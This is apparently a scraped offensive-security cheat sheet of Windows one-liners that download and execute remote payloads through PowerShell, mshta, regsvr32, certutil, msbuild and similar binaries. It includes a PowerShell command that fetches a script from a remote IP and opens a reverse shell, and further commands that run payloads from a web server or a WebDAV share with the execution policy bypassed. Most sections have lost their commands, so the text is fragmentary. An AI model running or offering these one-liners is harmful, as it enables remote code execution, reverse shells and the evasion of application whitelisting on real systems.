Oneliners for Code Execution

PowerShell

powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex

But you can also call the payload directly from a WebDAV server:

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Cmd

Check out the great work by Arno0x with Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily execute any binary, dll, script:

PowerShellScripts/Invoke-EmbedInBatch.ps1 at master · Arno0x/PowerShellScriptsGitHub

Cscript/Wscript

Mshta

As seen in the koadic framework mshta accepts a URL as an argument to execute an HTA file:

Rundll32

Wmic

Regasm/Regsvc

Application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:

Regsvr32

Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option:

Second option using UNC/WebDAV:

Odbcconf

To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

Msbuild

Certutil

Great work by @subTee for discovering this:

Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

You could simply deliver an executable:

This information was referenced from:

Windows oneliners to download remote payload and execute arbitrary codearno0x0x